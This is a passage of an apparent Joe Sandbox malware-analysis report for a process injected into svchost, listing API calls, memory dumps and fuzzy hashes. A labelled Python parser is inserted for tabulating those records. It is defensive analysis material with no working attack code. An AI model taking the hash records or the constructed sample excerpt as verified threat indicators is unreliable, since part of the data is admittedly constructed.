                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: 022a33274c00017e27d0856b3283fc4b76884d826ee56593da5a3b38b4d84440
                                                                      • Instruction ID: f6de4437b133a1ac129fa0d7b7dff93352f69e6a50dbd1a9d2a9ee316e6e9284
                                                                      • Opcode Fuzzy Hash: 022a33274c00017e27d0856b3283fc4b76884d826ee56593da5a3b38b4d84440
                                                                      • Instruction Fuzzy Hash: 20E06D71204214BBD614EE99DC41E9B33ACEFC5710F000419F909A7241D775B91087B9

                                                                      Control-flow Graph
                                                                      • Basic blocks: 228: 42d493-42d4cc (call 4046f3, call 42e2f3, ExitProcess)
                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,B7A2F3AD,?,?,B7A2F3AD), ref: 0042D4C7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: 6dd1fcf5dd1af0fda2152ff7e0dbaa7079de7d627a55fec9f36786b8ae35a334
                                                                      • Instruction ID: 1c4ddca568f19f0abcd5889a5007a7f8654b46b2af34716467b0874434781022
                                                                      • Opcode Fuzzy Hash: 6dd1fcf5dd1af0fda2152ff7e0dbaa7079de7d627a55fec9f36786b8ae35a334
                                                                      • Instruction Fuzzy Hash: 78E08671604214BBD110EA5ADC01F97775CDFC5714F50841AFA09A7242C6B5790187F4

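Added example, not part of the Joe Sandbox report or its tooling: a parser for the per-function record format used in this listing (the API call line with module and arguments, the Memory Dump Source offset, the Snapshot File name, the Similarity fields and the Instruction Fuzzy Hash). It tabulates which modules the image mapped at 0x400000 inside svchost reaches directly, decodes the message constant passed to PostThreadMessageW, and keeps each function's fuzzy hash keyed by its API ID for cross-sample matching. SAMPLE_REPORT is a constructed excerpt that copies the layout of records on this page; the function and constant names are mine, and WM_NAMES holds only the three winuser.h values listed.

```python
"""Parse Joe Sandbox execution-graph function records into structured data (added example)."""
import re
from collections import Counter

# Constructed excerpt: four records in the same layout as the listing on this page.
SAMPLE_REPORT = """
APIs
• PostThreadMessageW.USER32(721e5H878,00000111,00000000,00000000), ref: 004149F0
Memory Dump Source
• Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File: hcaresult_2_2_400000_svchost.jbxd
• API ID: MessagePostThread
• Instruction Fuzzy Hash: 4C11DB31E8025875DB21A6A1CC02FDF7F7C9F81754F548169FE047B281E6B8560787EA
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004181C5
Memory Dump Source
• Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File: hcaresult_2_2_400000_svchost.jbxd
• API ID: Load
• Instruction Fuzzy Hash: BFE02B37580449EFCB11DDB8C582899B361EB95B3076403C9E85D4B689CB77AC4E874A
APIs
• ExitProcess.KERNEL32(?,00000000,00000000,?,B7A2F3AD,?,?,B7A2F3AD), ref: 0042D4C7
Memory Dump Source
• Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Snapshot File: hcaresult_2_2_400000_svchost.jbxd
• API ID: ExitProcess
• Instruction Fuzzy Hash: 78E08671604214BBD110EA5ADC01F97775CDFC5714F50841AFA09A7242C6B5790187F4
APIs
  • Part of subcall function 03272DF0: LdrInitializeThunk.NTDLL ref: 03272DFA
Memory Dump Source
• Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
• Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
• API ID: InitializeThunk
• Instruction Fuzzy Hash: 00424C75920715DFDB61CF28C880BAAB7F5FF44314F1485AAE989DB241D770AA84CFA0
"""

# One API line: optional "Part of subcall function X: " prefix, Api.MODULE, optional (args), ref: address.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>[\w$@?]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
OFFSET_RE = re.compile(r"Offset: ([0-9A-Fa-f]+)")

# Window message constants (winuser.h) that may appear as the uMsg argument of PostThreadMessageW.
WM_NAMES = {0x0010: "WM_CLOSE", 0x0012: "WM_QUIT", 0x0111: "WM_COMMAND"}


def _arg(token):
    """Sandbox arguments are 8 hex digits when concrete; '?' and symbolic labels stay as strings."""
    token = token.strip()
    return int(token, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", token) else token


def parse_records(text):
    """Return one dict per function; a record is closed by its Instruction Fuzzy Hash line."""
    records, cur = [], {"apis": []}
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if not line:
            continue
        m = API_RE.match(line)
        if m:
            args = [] if m.group("args") is None else [_arg(a) for a in m.group("args").split(",")]
            cur["apis"].append({"api": m.group("api"), "module": m.group("module").upper(),
                                "args": args, "ref": int(m.group("ref"), 16),
                                "via_subcall": m.group("sub") is not None})
        elif line.startswith("Source File:"):
            off = OFFSET_RE.search(line)
            cur["image_base"] = int(off.group(1), 16) if off else None
        elif line.startswith("Snapshot File:"):
            # hcaresult_<pid>_<run>_<base>_<process>.jbxd -> process name
            cur["process"] = line.split("_")[-1].split(".")[0]
        elif line.startswith("API ID:"):
            cur["api_id"] = line.split(":", 1)[1].strip()
        elif line.startswith("Instruction Fuzzy Hash:"):
            cur["fuzzy_hash"] = line.split(":", 1)[1].strip()
            records.append(cur)
            cur = {"apis": []}
    return records


def summarize(records):
    """Count calls per module, list native (NTDLL) calls with their image base, decode uMsg values."""
    by_module, native, messages = Counter(), [], []
    for rec in records:
        for call in rec["apis"]:
            by_module[call["module"]] += 1
            if call["module"] == "NTDLL":
                native.append((rec.get("process"), hex(rec.get("image_base") or 0),
                               call["api"], call["via_subcall"]))
            if call["api"] == "PostThreadMessageW" and len(call["args"]) > 1 \
                    and isinstance(call["args"][1], int):
                messages.append(WM_NAMES.get(call["args"][1], hex(call["args"][1])))
    return {"by_module": dict(by_module), "native_calls": native, "thread_messages": messages,
            "fuzzy_hashes": {r["api_id"]: r["fuzzy_hash"] for r in records if "api_id" in r}}


if __name__ == "__main__":
    for key, value in summarize(parse_records(SAMPLE_REPORT)).items():
        print(key, value)
```

The same parser runs over the full listing once the report text is saved to a file; records whose API line has no parenthesised arguments (the subcall form) are handled by the optional group in API_RE, and arguments the sandbox could not resolve stay as the string "?" rather than being coerced to zero.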
                                                                      Control-flow Graph
                                                                      • Basic blocks: 233: 3272c0a-3272c0f; 234: 3272c11-3272c18; 235: 3272c1f-3272c26 (LdrInitializeThunk)
                                                                      • Edges: 233->234, 233->235
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: ddf7df053cb033a80d889b007025d13a7489c61b1d11ef926f86cbf702ff4bdb
                                                                      • Instruction ID: 8466f779504b5f1cafda1f469c5c32e8834b0409aa59219549dcaadebe4b4433
                                                                      • Opcode Fuzzy Hash: ddf7df053cb033a80d889b007025d13a7489c61b1d11ef926f86cbf702ff4bdb
                                                                      • Instruction Fuzzy Hash: D7B09B719125D5C5EA11F7604608717790577E0701F5AC465D3030645E4739C1D1E175
                                                                      APIs
                                                                        • Part of subcall function 03272DF0: LdrInitializeThunk.NTDLL ref: 03272DFA
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03270BA3
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03270BB6
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03270D60
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03270D74
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 1404860816-0
                                                                      • Opcode ID: e73986b18dc171c0cfdad3d73b6c045494a24ba842e73cb35f46c5d728584251
                                                                      • Instruction ID: f9d8f0158add07b13046e7d9dc5ecc8f170b72bf400123070320cf22355f4b7f
                                                                      • Opcode Fuzzy Hash: e73986b18dc171c0cfdad3d73b6c045494a24ba842e73cb35f46c5d728584251
                                                                      • Instruction Fuzzy Hash: 00424C75920715DFDB61CF28C880BAAB7F5FF44314F1485AAE989DB241D770AA84CFA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: db1f535bb89c5d336865e12d595bc1a1a182b071483d0242fa1d010813156277
                                                                      • Instruction ID: 7ded69b200e0fa3a520095e092d354cea950e029d2d9aa94011139d43d490d6a
                                                                      • Opcode Fuzzy Hash: db1f535bb89c5d336865e12d595bc1a1a182b071483d0242fa1d010813156277
                                                                      • Instruction Fuzzy Hash: 3A90023161680412A140B25848C4586400697E0301B95C011E142455CC8B148A965361
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9220b5404d26921ea5f20835cad07062a107be8ac51a6a7134db3fed0fa842e9
                                                                      • Instruction ID: 048902a242d67cae18913502e246d8c5898791e3ca341058417db9e9ae1f7cda
                                                                      • Opcode Fuzzy Hash: 9220b5404d26921ea5f20835cad07062a107be8ac51a6a7134db3fed0fa842e9
                                                                      • Instruction Fuzzy Hash: 38900261612504425140B2584844446600697E13013D5C115A1554568C871889959269
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 19ff5b3126dc32b96f15b1a23e8c53ce7f09b5421a664bb469f7c3a6b37a75c3
                                                                      • Instruction ID: bc9accecedfdd98ada8ea08629dede1af0a3f2c9d9fbd1172ac32dace9bd06d5
                                                                      • Opcode Fuzzy Hash: 19ff5b3126dc32b96f15b1a23e8c53ce7f09b5421a664bb469f7c3a6b37a75c3
                                                                      • Instruction Fuzzy Hash: 9090023161640C02E150B2584454786000687D0301F95C011A102465CD87558B9576A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 537b0f8f159a357ac9456fec242540c74a74c8b781a72c6509a54cf9e5edbd6a
                                                                      • Instruction ID: c034fcc46f503689c68bb38355bb2a771afbbf8c154d9616e452c90b8cc731a0
                                                                      • Opcode Fuzzy Hash: 537b0f8f159a357ac9456fec242540c74a74c8b781a72c6509a54cf9e5edbd6a
                                                                      • Instruction Fuzzy Hash: 6A90023121240C02E104B25848446C6000687D0301F95C011A702465DE976589D17131
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aaefac259a29df7180d0cf00794016d2b996cb2dc09485b952e13acc56dd2b07
                                                                      • Instruction ID: 88974a77f0cbebc3464e8229b0d04f090b8d0272c32e7e2d87a304b026109825
                                                                      • Opcode Fuzzy Hash: aaefac259a29df7180d0cf00794016d2b996cb2dc09485b952e13acc56dd2b07
                                                                      • Instruction Fuzzy Hash: 5E90023121644C42E140B2584444A86001687D0305F95C011A106469CD97258E95B661
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b0b9b22d83725d32a7258191ad4fbdf66494e9bbdef1e8d892260adf606e90d3
                                                                      • Instruction ID: 4aef2f8a9420fb87cbe2a381ad362ef75d93a4d7728c68c9caf6531cb7bbf149
                                                                      • Opcode Fuzzy Hash: b0b9b22d83725d32a7258191ad4fbdf66494e9bbdef1e8d892260adf606e90d3
                                                                      • Instruction Fuzzy Hash: 7E90023121240C02E180B258444468A000687D1301FD5C015A102565CDCB158B9977A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c887387774d3828f5242ca9c320e0a4997fcc59b383e564d26b6195cd0cfc80e
                                                                      • Instruction ID: ac0c1d6bb55c1fa0056f5d883e8eff144b3fb8b4911d2420c35330249c65676a
                                                                      • Opcode Fuzzy Hash: c887387774d3828f5242ca9c320e0a4997fcc59b383e564d26b6195cd0cfc80e
                                                                      • Instruction Fuzzy Hash: 449002A1212544925500F3588444B4A450687E0301B95C016E2054568CC62589919135
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ee17d8d375f5773837d19f697d342fac76fbc87650532198b6ca233cceb30b6
                                                                      • Instruction ID: 915b05f2a9dd9b542d2f3ef1f0408b345ce280ed6ebc1ad2a383eeade6d560cd
                                                                      • Opcode Fuzzy Hash: 9ee17d8d375f5773837d19f697d342fac76fbc87650532198b6ca233cceb30b6
                                                                      • Instruction Fuzzy Hash: 36900225232404021145F658064454B044697D63513D5C015F2416598CC72189A55321
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9fd8441668ae3f6f6763315a7d4882743a9f0a410057e24c8f134e15350c322c
                                                                      • Instruction ID: caed76c3d16eb8978d9dfb8c574c745c05a9f14dde67d4ab48c94ca9e20b275d
                                                                      • Opcode Fuzzy Hash: 9fd8441668ae3f6f6763315a7d4882743a9f0a410057e24c8f134e15350c322c
                                                                      • Instruction Fuzzy Hash: A6900225222404031105F6580744547004787D5351395C021F2015558CD72189A15121
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c74eec372dbece9bc8debe5ccae24cf344253fa3be09e440b1a843406d795a4e
                                                                      • Instruction ID: 873e47495b97d91af09b258eaf27379c045c443aac763415d8af2b97f7ecddf9
                                                                      • Opcode Fuzzy Hash: c74eec372dbece9bc8debe5ccae24cf344253fa3be09e440b1a843406d795a4e
                                                                      • Instruction Fuzzy Hash: 2A90026135240842E100B2584454B460006C7E1301F95C015E206455CD8719CD926126
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5bf7517501b6cbf6555a1b31d4101ff2a5edcb75092bc31c176a60626395876e
                                                                      • Instruction ID: 07f6c78858d55dd02bc3bc35a074a656ec6f5b8c4faadd20c5bd1cb9c0d8a617
                                                                      • Opcode Fuzzy Hash: 5bf7517501b6cbf6555a1b31d4101ff2a5edcb75092bc31c176a60626395876e
                                                                      • Instruction Fuzzy Hash: BE90026122240442E104B2584444746004687E1301F95C012A315455CCC6298DA15125
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c11290c255c7d6e546c41371d240ebd6a1b74ce998d9a39ee07d2ddcc1e7d57d
                                                                      • Instruction ID: 7fadb57c10aa573213c1979dd3be6130ee31c56b678b90e44603402477907edd
                                                                      • Opcode Fuzzy Hash: c11290c255c7d6e546c41371d240ebd6a1b74ce998d9a39ee07d2ddcc1e7d57d
                                                                      • Instruction Fuzzy Hash: 1990023121280802E100B2584848787000687D0302F95C011A616455DE8765C9D16531
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4d643031ec8b2cdb0bc93a02b7c38e1e0167fa36444c27c23e8aa4cbaad493b1
                                                                      • Instruction ID: 3c7a80b5ede86109967752dc95b99ade5a9fe777300bab2caeca7a809f0fb3f5
                                                                      • Opcode Fuzzy Hash: 4d643031ec8b2cdb0bc93a02b7c38e1e0167fa36444c27c23e8aa4cbaad493b1
                                                                      • Instruction Fuzzy Hash: 9C900221612404425140B26888849464006ABE1311795C121A1998558D865989A55665
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 064e675ef9ed47abe524adc83ad72984d82c6468d3ffaffe338a3ec33a8b9c1a
                                                                      • Instruction ID: 4ee841a18505364bc4779aa6e53250b00003983a91eb7d2168394b694972cd4b
                                                                      • Opcode Fuzzy Hash: 064e675ef9ed47abe524adc83ad72984d82c6468d3ffaffe338a3ec33a8b9c1a
                                                                      • Instruction Fuzzy Hash: C790023121280802E100B258485474B000687D0302F95C011A216455DD872589916571
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0aea9af54a3976220a7383dc598de9daa71585c0121524161018005ded10112c
                                                                      • Instruction ID: c47ebbd53c4819a479da1ad0dd3b8374de93ea03345420332e16ba08fa650c09
                                                                      • Opcode Fuzzy Hash: 0aea9af54a3976220a7383dc598de9daa71585c0121524161018005ded10112c
                                                                      • Instruction Fuzzy Hash: 51900221222C0442E200B6684C54B47000687D0303F95C115A115455CCCA1589A15521
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0a854a148c51a6415361c851739c1cca893670a771226e71691ef295b000ec0e
                                                                      • Instruction ID: c173a74e2befc2fe1ab842000eb8e2bc9d5b5b4127d4a18aca43c9e9efb20bbd
                                                                      • Opcode Fuzzy Hash: 0a854a148c51a6415361c851739c1cca893670a771226e71691ef295b000ec0e
                                                                      • Instruction Fuzzy Hash: 3F90022131240802E102B2584454646000AC7D1345FD5C012E242455DD87258A93A132
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fe8e58985dca6ba5d94fcb71b8a727a36b53f5d138c6ffdf1cfc46f807db65a9
                                                                      • Instruction ID: 20611e4d67632d7dbfe9227979a89c1fecb0d633ac3df7136c406726947e3310
                                                                      • Opcode Fuzzy Hash: fe8e58985dca6ba5d94fcb71b8a727a36b53f5d138c6ffdf1cfc46f807db65a9
                                                                      • Instruction Fuzzy Hash: BC90027121240802E140B2584444786000687D0301F95C011A606455CE87598ED56665
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 467b1a68dd167b5fe9940bfffd6f999b07f4656a7587b30bee87d0c00e4cc6f1
                                                                      • Instruction ID: 331bd83b2664cff092dcb64dd8bc19dd3822dfb34e38af495323c7032d93287c
                                                                      • Opcode Fuzzy Hash: 467b1a68dd167b5fe9940bfffd6f999b07f4656a7587b30bee87d0c00e4cc6f1
                                                                      • Instruction Fuzzy Hash: B790022161240902E101B2584444656000B87D0341FD5C022A202455DECB258AD2A131
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e9ce60765bf8d9a20b3731140be71d26f50fe79a183535af5c5d0bf6317e9070
                                                                      • Instruction ID: 62d61ec15d13db521f2baf696dd9e3914100c729e1d10833c5567c51b00e1fee
                                                                      • Opcode Fuzzy Hash: e9ce60765bf8d9a20b3731140be71d26f50fe79a183535af5c5d0bf6317e9070
                                                                      • Instruction Fuzzy Hash: BA90026121280803E140B6584844647000687D0302F95C011A306455DE8B298D916135
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6060a5b7faf4674d83fbfeade4d0def172df7df31bef505a3c9cf71b1089a620
                                                                      • Instruction ID: 2376e335e1f187b4350137f94e9293b207312bed05f4563f6d23544bbf2c2351
                                                                      • Opcode Fuzzy Hash: 6060a5b7faf4674d83fbfeade4d0def172df7df31bef505a3c9cf71b1089a620
                                                                      • Instruction Fuzzy Hash: C590022131240403E140B25854586464006D7E1301F95D011E141455CCDA1589965222
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dc67db42f9336f1dae99cf9078117d4300c69ebe2448794f46cb1a53718dde09
                                                                      • Instruction ID: a4b129d371484fd1a48b036ce0dd7e328060f86c9cfb737f721be76114ba482d
                                                                      • Opcode Fuzzy Hash: dc67db42f9336f1dae99cf9078117d4300c69ebe2448794f46cb1a53718dde09
                                                                      • Instruction Fuzzy Hash: 9B90022121644842E100B6585448A46000687D0305F95D011A206459DDC7358991A131
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d8be82e647302789dc6a0fec914aca8f12a0126e4d1c45b1077c5654aa6c158b
                                                                      • Instruction ID: 7b7f10e9e739d4761e69c567290b65dfec8a5744cc5f62991fc1ce9598ad6ef3
                                                                      • Opcode Fuzzy Hash: d8be82e647302789dc6a0fec914aca8f12a0126e4d1c45b1077c5654aa6c158b
                                                                      • Instruction Fuzzy Hash: 7D90022922340402E180B258544864A000687D1302FD5D415A101555CCCA1589A95321
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8e58ba20026eac1b83439d5d9b8f4b0c39937aca1bac26dbc4807e264d531b02
                                                                      • Instruction ID: 70e3fd17ffe6c7f6e9d536d8e4fe87935b52438c9a68b74b610688df30d59cb5
                                                                      • Opcode Fuzzy Hash: 8e58ba20026eac1b83439d5d9b8f4b0c39937aca1bac26dbc4807e264d531b02
                                                                      • Instruction Fuzzy Hash: C190023125240802E141B2584444646000A97D0341FD5C012A142455CE87558B96AA61
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f1db30c4d798610f48770e3cc442b748209807bca7a1c9378a7904b0b4bff614
                                                                      • Instruction ID: 465edfae94fc2cf18ca0407c5a1635ff4812c2e135fd733b082e809e65fb2f69
                                                                      • Opcode Fuzzy Hash: f1db30c4d798610f48770e3cc442b748209807bca7a1c9378a7904b0b4bff614
                                                                      • Instruction Fuzzy Hash: 7D900221253445526545F2584444547400797E03417D5C012A2414958C86269996D621
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0481ea74049fb896fde31f96817b64768b1d8d05ace1ad6539e47e5253c6c625
